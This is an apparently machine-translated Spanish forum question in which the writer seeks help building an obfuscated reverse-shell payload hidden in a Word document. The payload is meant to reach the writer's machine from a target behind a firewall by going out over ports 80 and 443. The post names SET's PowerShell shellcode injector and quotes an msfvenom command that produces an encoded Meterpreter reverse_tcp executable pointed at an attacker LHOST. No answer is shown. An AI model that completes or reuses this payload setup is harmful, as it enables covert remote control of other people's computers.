Estoy tratando de construir una carga útil para insertarla como un código ofuscado en un documento de Word, que creará un oyente en la máquina atacada y me permitirá ejecutar algunos comandos (no a través del archivo .exe como se muestra en los tonos de los videos). )
Estoy asumiendo: La máquina atacada está detrás de un firewall, que bloquea el tráfico saliente, excepto el puerto 80 y el 443. Por lo tanto, quiero que el tráfico de la máquina atacada se reenvíe A esos puertos, para que pueda escuchar y ejecutar.
Estoy usando el kit de herramientas SET (en Kali), seleccione "ataques de ingeniería social" - > powershell attack vectors - > Inyector de código de shell alfanumérico.
Solicita LHOST, que es mi IP pública, reenviada a mi IP interna (estoy detrás del enrutador).
Luego solicita LPORT y eso es todo.
Mi entendimiento es LPORT - Puerto local, que significa puerto. Voy a aceptar tráfico proveniente de la máquina atacada. Pero en este caso, ¿CÓMO puedo especificar un puerto saliente para la máquina ATTACKED?
Me gustaría una solución de medidor de metro, si es posible. No me importa si es un vector de PowerShell u otro, ya que la carga útil, si entiendo correctamente, solo me abre la posibilidad de escuchar y ejecutar comandos en la máquina atacada.
En una hoja de trucos del Instituto SANS he encontrado un comando interesante:
msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Aquí parece que LPORT se introduce en un archivo de malware, pero en este caso será exactamente lo que necesito; un puerto para el tráfico saliente de la máquina atacada.